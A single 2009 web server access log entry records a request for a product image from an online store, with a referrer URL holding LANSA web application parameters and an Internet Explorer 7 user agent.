212.33.197.126 - - [25/May/2009:04:12:52 -0400] "GET /images/items/6471097_FULL.JPG HTTP/1.1" 200 7635 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L000B39456CE163000D2D09I+WSEQ(S0060):1+OUITEM(A0200):6471097" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; InfoPath.1)"
